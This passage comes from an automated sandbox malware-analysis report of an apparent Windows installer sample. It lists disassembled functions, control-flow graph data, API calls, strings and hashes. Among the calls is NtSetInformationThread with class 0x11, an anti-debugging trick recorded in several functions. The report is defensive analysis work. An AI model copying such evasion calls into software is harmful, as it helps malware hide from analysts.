8013->8003 8018 6bf33af1-6bf33af8 8013->8018 8015->7970 8015->7971 8026 6bf33d3a-6bf33d3c 8016->8026 8027 6bf33cec-6bf33d0c 8016->8027 8024 6bf33c26-6bf33c2d 8017->8024 8025 6bf33dc5 8017->8025 8028 6bf33b62-6bf33b85 8018->8028 8029 6bf33afa-6bf33aff 8018->8029 8047 6bf33eea-6bf33f04 call 6c0819e0 call 6c0819f0 8019->8047 8021->7970 8022->7993 8023 6bf33b56-6bf33b5d 8022->8023 8023->7972 8034 6bf33dc3 8024->8034 8035 6bf33c33-6bf33c3a 8024->8035 8032 6bf33dc6 8025->8032 8037 6bf33d70-6bf33d8d 8026->8037 8038 6bf33d3e-6bf33d45 8026->8038 8036 6bf33d90-6bf33d95 8027->8036 8028->8003 8033 6bf33b8b 8028->8033 8029->8005 8041 6bf33dc8-6bf33dcc 8032->8041 8033->7975 8034->8025 8042 6bf33c40-6bf33c5b 8035->8042 8043 6bf33e26-6bf33e2b 8035->8043 8045 6bf33d97-6bf33db8 8036->8045 8046 6bf33dba-6bf33dc1 8036->8046 8037->8036 8044 6bf33d50-6bf33d57 8038->8044 8041->7992 8052 6bf33dd2 8041->8052 8051 6bf33e1b-6bf33e24 8042->8051 8049 6bf33e31 8043->8049 8050 6bf33c7b-6bf33cd0 8043->8050 8044->8032 8045->8025 8046->8034 8053 6bf33dd7-6bf33ddc 8046->8053 8064 6bf33f75-6bf33fa1 8047->8064 8049->7978 8050->8044 8051->8041 8057 6bf33e76-6bf33e79 8052->8057 8055 6bf33e36-6bf33e3d 8053->8055 8056 6bf33dde-6bf33e17 8053->8056 8060 6bf33e3f-6bf33e5a 8055->8060 8061 6bf33e5c-6bf33e5f 8055->8061 8056->8051 8057->8019 8060->8051 8061->8050 8063 6bf33e65-6bf33e69 8061->8063 8063->8041 8063->8057 8068 6bf33fa3-6bf33fa8 8064->8068 8069 6bf34020-6bf34026 8064->8069 8072 6bf33fae-6bf33fcf 8068->8072 8073 6bf3407c-6bf34081 8068->8073 8070 6bf33f06-6bf33f35 8069->8070 8071 6bf3402c-6bf3403c 8069->8071 8078 6bf33f38-6bf33f61 8070->8078 8074 6bf340b3-6bf340b8 8071->8074 8075 6bf3403e-6bf34058 8071->8075 8077 6bf340aa-6bf340ae 8072->8077 8076 6bf34083-6bf3408a 8073->8076 8073->8077 8074->8072 8081 6bf340be-6bf340c9 8074->8081 8079 6bf3405a-6bf34063 8075->8079 8076->8078 8080 6bf34090 8076->8080 8082 6bf33f6b-6bf33f6f 8077->8082 8083 6bf33f64-6bf33f67 8078->8083 8085 6bf340f5-6bf3413f 8079->8085 8086 6bf34069-6bf3406c 8079->8086 8080->8047 8081->8077 8087 6bf340cb-6bf340d4 8081->8087 8082->8064 8084 6bf33f69 8083->8084 8084->8082 8085->8084 8089 6bf34072-6bf34077 8086->8089 8090 6bf34144-6bf3414b 8086->8090 8091 6bf340a7 8087->8091 8092 6bf340d6-6bf340f0 8087->8092 8089->8083 8090->8082 8091->8077 8092->8079
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: b53a6fd6b306d538fdcc07c075b9cd68c1dc0aed36e8a6d952d10096a1af8d63
                            • Instruction ID: 64883e090aa218d9e82f64be5466cd1ee5b55bbfa9f53d89bec019ccdad81be7
                            • Opcode Fuzzy Hash: b53a6fd6b306d538fdcc07c075b9cd68c1dc0aed36e8a6d952d10096a1af8d63
                            • Instruction Fuzzy Hash: 2B51BE33604B218FC330CF28C8807D5B7E3AF95310F698A5DC0E65B6A5DB79B44A8B91
                            Function 6BF339CF Relevance: 3.1, APIs: 2, Instructions: 139threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 786ad380be988c6654ce6757878c6b86f8a84daa50015ca9c927b4dad2b65116
                            • Instruction ID: de42b8bc63bb652e6f4a45222fa295f1df26d056fc22c7522b33ed0304e67995
                            • Opcode Fuzzy Hash: 786ad380be988c6654ce6757878c6b86f8a84daa50015ca9c927b4dad2b65116
                            • Instruction Fuzzy Hash: 7751C033504B218FC730CF28C480795B7E3BF95310F698A5DC0E65B2A5DB79B44A8B91
                            Function 6BF33D18 Relevance: 3.1, APIs: 2, Instructions: 89threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF33E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF33EAA
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 8d5324aaaa7fe95ec1a210bed97fbe71b58cc587d3b6920cb30ffd87f8b31013
                            • Instruction ID: aaf4c3002e34ba7121724266c47b3e295ba347f6d285c14d24a44013f9c621ef
                            • Opcode Fuzzy Hash: 8d5324aaaa7fe95ec1a210bed97fbe71b58cc587d3b6920cb30ffd87f8b31013
                            • Instruction Fuzzy Hash: A631E133645B11CBD730CF38C8847C6B7A3AF96314F598A5DC0E65B2A1DB7970098B91
                            Function 6BF33D62 Relevance: 3.1, APIs: 2, Instructions: 83threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF33E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF33EAA
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 21860b453ecb48d7e35b7873562641f1d7a6174bab3ce785a90043c8e2d852ea
                            • Instruction ID: c9a659ed2729809017ce685777c3c1bedb5fb6c8aad03f818374e25e4354bae0
                            • Opcode Fuzzy Hash: 21860b453ecb48d7e35b7873562641f1d7a6174bab3ce785a90043c8e2d852ea
                            • Instruction Fuzzy Hash: DE312133104B11CBC734CF28C480796BBB3AF82304F658A5CC0EA5B2A1DB7A7049CB91
                            Function 6C0B5690 Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C0B56A0
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ManagerOpen
                            • String ID:
                            • API String ID: 1889721586-0
                            • Opcode ID: 1ecc2657c387382fcaf8a4e01eb418e6ebf6cad487be0925c1cb2bcda99e7509
                            • Instruction ID: dc65375a5580c1c30429f015b657b876954d546919323d20a4a091b73d669718
                            • Opcode Fuzzy Hash: 1ecc2657c387382fcaf8a4e01eb418e6ebf6cad487be0925c1cb2bcda99e7509
                            • Instruction Fuzzy Hash: ED312B78A48342EFC701CF29D544B0EBBF4EB89764F50889AF889D7361C371C9459B66
                            Function 6BF33C62 Relevance: 3.1, APIs: 2, Instructions: 72threadnativeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF33E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF33EAA
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 65985e1a883fd4209a227fa68b4e7f24a9835aa07e48ea78dc63e4eb3e5d7b8a
                            • Instruction ID: e53658f37a4f74f76cefc8cb8c2b1360a79be3a0bb54c96befc73276535cc3c7
                            • Opcode Fuzzy Hash: 65985e1a883fd4209a227fa68b4e7f24a9835aa07e48ea78dc63e4eb3e5d7b8a
                            • Instruction Fuzzy Hash: B921E573218B118BD734CF34C890796B7B6AF42304F548A5DC0E64B2A1DB7D74448B91
                            Function 6C0AB430 Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileA.KERNEL32(?,?), ref: 6C0AB44C
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID:
                            • API String ID: 1974802433-0
                            • Opcode ID: 1a108bd7e703966fc8b53d6ba74ddd8de862d479e0ac45e4816e0d1cd453bc2f
                            • Instruction ID: b8736eded5ca51b0603c447f0b76f312a67930d81222c453e9ac686bf8ef6f55
                            • Opcode Fuzzy Hash: 1a108bd7e703966fc8b53d6ba74ddd8de862d479e0ac45e4816e0d1cd453bc2f
                            • Instruction Fuzzy Hash: 63115A74508354AFD700CFA8D58460EBBE4BF86314F548E59F4A8CBB92D330CC868B06
                            Function 6C08AFA0 Relevance: 44.5, APIs: 3, Strings: 22, Instructions: 734fileCOMMON
                            Download Yara Rule
                            APIs
                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C08B117
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                            • API String ID: 2738559852-1563143607
                            • Opcode ID: a4bc5a7173fbfa4c77bd98498d11b804311b87ea2f9e0908fb1d0fa749ab01e9
                            • Instruction ID: b59c9f3c078c8fd92b26b5c079e6c2cc97f67db76ebaf1d95675214a0f4abfd6
                            • Opcode Fuzzy Hash: a4bc5a7173fbfa4c77bd98498d11b804311b87ea2f9e0908fb1d0fa749ab01e9
                            • Instruction Fuzzy Hash: B262477060A7818FCB24CF28C890B5EBBE1ABD9314F648D1EE8A9CB751D735D8458B46
                            Function 6C0CD043 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 6824 6c0cd043-6c0cd053 6825 6c0cd06d-6c0cd06f 6824->6825 6826 6c0cd055-6c0cd068 call 6c0bff4f call 6c0bff3c 6824->6826 6828 6c0cd3d4-6c0cd3e1 call 6c0bff4f call 6c0bff3c 6825->6828 6829 6c0cd075-6c0cd07b 6825->6829 6840 6c0cd3ec 6826->6840 6846 6c0cd3e7 call 6c0c0690 6828->6846 6829->6828 6832 6c0cd081-6c0cd0a7 6829->6832 6832->6828 6835 6c0cd0ad-6c0cd0b6 6832->6835 6838 6c0cd0b8-6c0cd0cb call 6c0bff4f call 6c0bff3c 6835->6838 6839 6c0cd0d0-6c0cd0d2 6835->6839 6838->6846 6843 6c0cd0d8-6c0cd0db 6839->6843 6844 6c0cd3d0-6c0cd3d2 6839->6844 6845 6c0cd3ef-6c0cd3f2 6840->6845 6843->6844 6848 6c0cd0e1-6c0cd0e5 6843->6848 6844->6845 6846->6840 6848->6838 6849 6c0cd0e7-6c0cd0fe 6848->6849 6852 6c0cd14f-6c0cd155 6849->6852 6853 6c0cd100-6c0cd103 6849->6853 6857 6c0cd11b-6c0cd132 call 6c0bff4f call 6c0bff3c call 6c0c0690 6852->6857 6858 6c0cd157-6c0cd161 6852->6858 6855 6c0cd105-6c0cd10e 6853->6855 6856 6c0cd113-6c0cd119 6853->6856 6859 6c0cd1d3-6c0cd1e3 6855->6859 6856->6857 6861 6c0cd137-6c0cd14a 6856->6861 6888 6c0cd307 6857->6888 6862 6c0cd168-6c0cd186 call 6c0c4d65 call 6c0c4d2b * 2 6858->6862 6863 6c0cd163-6c0cd165 6858->6863 6866 6c0cd2a8-6c0cd2b1 call 6c0d1f55 6859->6866 6867 6c0cd1e9-6c0cd1f5 6859->6867 6861->6859 6894 6c0cd188-6c0cd19e call 6c0bff3c call 6c0bff4f 6862->6894 6895 6c0cd1a3-6c0cd1cc call 6c0cb1d9 6862->6895 6863->6862 6879 6c0cd324 6866->6879 6880 6c0cd2b3-6c0cd2c5 6866->6880 6867->6866 6869 6c0cd1fb-6c0cd1fd 6867->6869 6869->6866 6872 6c0cd203-6c0cd227 6869->6872 6872->6866 6877 6c0cd229-6c0cd23f 6872->6877 6877->6866 6881 6c0cd241-6c0cd243 6877->6881 6883 6c0cd328-6c0cd340 ReadFile 6879->6883 6880->6879 6885 6c0cd2c7-6c0cd2d6 GetConsoleMode 6880->6885 6881->6866 6887 6c0cd245-6c0cd26b 6881->6887 6889 6c0cd39c-6c0cd3a7 GetLastError 6883->6889 6890 6c0cd342-6c0cd348 6883->6890 6885->6879 6891 6c0cd2d8-6c0cd2dc 6885->6891 6887->6866 6892 6c0cd26d-6c0cd283 6887->6892 6893 6c0cd30a-6c0cd314 call 6c0c4d2b 6888->6893 6897 6c0cd3a9-6c0cd3bb call 6c0bff3c call 6c0bff4f 6889->6897 6898 6c0cd3c0-6c0cd3c3 6889->6898 6890->6889 6896 6c0cd34a 6890->6896 6891->6883 6899 6c0cd2de-6c0cd2f8 ReadConsoleW 6891->6899 6892->6866 6904 6c0cd285-6c0cd287 6892->6904 6893->6845 6894->6888 6895->6859 6907 6c0cd34d-6c0cd35f 6896->6907 6897->6888 6900 6c0cd3c9-6c0cd3cb 6898->6900 6901 6c0cd300-6c0cd306 call 6c0bff62 6898->6901 6908 6c0cd319-6c0cd322 6899->6908 6909 6c0cd2fa GetLastError 6899->6909 6900->6893 6901->6888 6904->6866 6911 6c0cd289-6c0cd2a3 6904->6911 6907->6893 6915 6c0cd361-6c0cd365 6907->6915 6908->6907 6909->6901 6911->6866 6920 6c0cd37e-6c0cd389 6915->6920 6921 6c0cd367-6c0cd377 call 6c0cd46e 6915->6921 6922 6c0cd38b call 6c0cd3f3 6920->6922 6923 6c0cd395-6c0cd39a call 6c0cd726 6920->6923 6930 6c0cd37a-6c0cd37c 6921->6930 6931 6c0cd390-6c0cd393 6922->6931 6923->6931 6930->6893 6931->6930
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 8f9cc9f6d346b96a60dead2f593ebba4d2703f9fb3153c1d32fb2d7c11a41a59
                            • Instruction ID: 852a95cb44b831e5e3c5971400ae3e3caf16397ce21aa5a11b724fba5d57b45b
                            • Opcode Fuzzy Hash: 8f9cc9f6d346b96a60dead2f593ebba4d2703f9fb3153c1d32fb2d7c11a41a59
                            • Instruction Fuzzy Hash: 89C1D374B48349AFDF01CF98C880BADBBF5EF4A318F504159E524ABB91C771A945CB22
                            Function 6C0D45DC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 6933 6c0d45dc-6c0d460c call 6c0d4a5c 6936 6c0d460e-6c0d4619 call 6c0bff4f 6933->6936 6937 6c0d4627-6c0d4633 call 6c0d1b7c 6933->6937 6942 6c0d461b-6c0d4622 call 6c0bff3c 6936->6942 6943 6c0d464c-6c0d4695 call 6c0d49c7 6937->6943 6944 6c0d4635-6c0d464a call 6c0bff4f call 6c0bff3c 6937->6944 6951 6c0d4901-6c0d4905 6942->6951 6953 6c0d4697-6c0d46a0 6943->6953 6954 6c0d4702-6c0d470b GetFileType 6943->6954 6944->6942 6958 6c0d46d7-6c0d46fd GetLastError call 6c0bff62 6953->6958 6959 6c0d46a2-6c0d46a6 6953->6959 6955 6c0d470d-6c0d473e GetLastError call 6c0bff62 CloseHandle 6954->6955 6956 6c0d4754-6c0d4757 6954->6956 6955->6942 6972 6c0d4744-6c0d474f call 6c0bff3c 6955->6972 6963 6c0d4759-6c0d475e 6956->6963 6964 6c0d4760-6c0d4766 6956->6964 6958->6942 6959->6958 6960 6c0d46a8-6c0d46d5 call 6c0d49c7 6959->6960 6960->6954 6960->6958 6966 6c0d476a-6c0d47b8 call 6c0d1d20 6963->6966 6965 6c0d4768 6964->6965 6964->6966 6965->6966 6975 6c0d47ba-6c0d47c6 call 6c0d4bd6 6966->6975 6976 6c0d47d7-6c0d47ff call 6c0d4c80 6966->6976 6972->6942 6975->6976 6982 6c0d47c8 6975->6982 6983 6c0d4804-6c0d4845 6976->6983 6984 6c0d4801-6c0d4802 6976->6984 6987 6c0d47ca-6c0d47d2 call 6c0cbe95 6982->6987 6985 6c0d4847-6c0d484b 6983->6985 6986 6c0d4866-6c0d4874 6983->6986 6984->6987 6985->6986 6988 6c0d484d-6c0d4861 6985->6988 6989 6c0d48ff 6986->6989 6990 6c0d487a-6c0d487e 6986->6990 6987->6951 6988->6986 6989->6951 6990->6989 6992 6c0d4880-6c0d48b3 CloseHandle call 6c0d49c7 6990->6992 6996 6c0d48b5-6c0d48e1 GetLastError call 6c0bff62 call 6c0d1c8f 6992->6996 6997 6c0d48e7-6c0d48fb 6992->6997 6996->6997 6997->6989
                            APIs
                              • Part of subcall function 6C0D49C7: CreateFileW.KERNEL32(00000000,00000000,?,6C0D4685,?,?,00000000,?,6C0D4685,00000000,0000000C), ref: 6C0D49E4
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D46F0
                            • __dosmaperr.LIBCMT ref: 6C0D46F7
                            • GetFileType.KERNEL32(00000000), ref: 6C0D4703
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D470D
                            • __dosmaperr.LIBCMT ref: 6C0D4716
                            • CloseHandle.KERNEL32(00000000), ref: 6C0D4736
                            • CloseHandle.KERNEL32(6C0CB640), ref: 6C0D4883
                            • GetLastError.KERNEL32 ref: 6C0D48B5
                            • __dosmaperr.LIBCMT ref: 6C0D48BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: 8Q
                            • API String ID: 4237864984-4022487301
                            • Opcode ID: 9159943bf4bfa1591870aa40319b1d2bf42564415fa1f5a5e7da35b20efd34e6
                            • Instruction ID: 3816cb5adf42f6c0e3bf229d728e6a2dbc47bae5acf1f5f36403e38fc8bf95a8
                            • Opcode Fuzzy Hash: 9159943bf4bfa1591870aa40319b1d2bf42564415fa1f5a5e7da35b20efd34e6
                            • Instruction Fuzzy Hash: DAA14932A14249AFCF09CFA8C8517AD7BF5AF07328F190159E811EF790CB35A916CB55
                            Function 6C08C750 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 183COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7002 6c08c750-6c08c7a9 call 6c0b70e0 7005 6c08c7d0-6c08c7d9 7002->7005 7006 6c08c7db-6c08c7e0 7005->7006 7007 6c08c820-6c08c825 7005->7007 7008 6c08c860-6c08c865 7006->7008 7009 6c08c7e2-6c08c7e7 7006->7009 7010 6c08c8a0-6c08c8a5 7007->7010 7011 6c08c827-6c08c82c 7007->7011 7012 6c08c86b-6c08c870 7008->7012 7013 6c08c9a1-6c08c9b8 WriteFile 7008->7013 7016 6c08c7ed-6c08c7f2 7009->7016 7017 6c08c8e2-6c08c94f WriteFile 7009->7017 7014 6c08c9f9-6c08ca29 call 6c0bb910 7010->7014 7015 6c08c8ab-6c08c8b0 7010->7015 7018 6c08c832-6c08c837 7011->7018 7019 6c08c977-6c08c98b 7011->7019 7020 6c08c9c2-6c08c9ef call 6c0bbe90 ReadFile 7012->7020 7021 6c08c876-6c08c87b 7012->7021 7013->7020 7014->7005 7023 6c08ca2e-6c08ca33 7015->7023 7024 6c08c8b6-6c08c8dd 7015->7024 7025 6c08c7f8-6c08c7fd 7016->7025 7026 6c08c959-6c08c96d WriteFile 7016->7026 7017->7026 7028 6c08c7ab-6c08c7c0 7018->7028 7029 6c08c83d-6c08c842 7018->7029 7027 6c08c98f-6c08c99c 7019->7027 7020->7014 7021->7005 7031 6c08c881-6c08c89b 7021->7031 7023->7005 7034 6c08ca39-6c08ca47 7023->7034 7032 6c08c7c3-6c08c7c8 7024->7032 7025->7005 7035 6c08c7ff-6c08c81a 7025->7035 7026->7019 7027->7005 7028->7032 7029->7005 7036 6c08c844-6c08c857 7029->7036 7031->7027 7032->7005 7035->7032 7036->7032
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
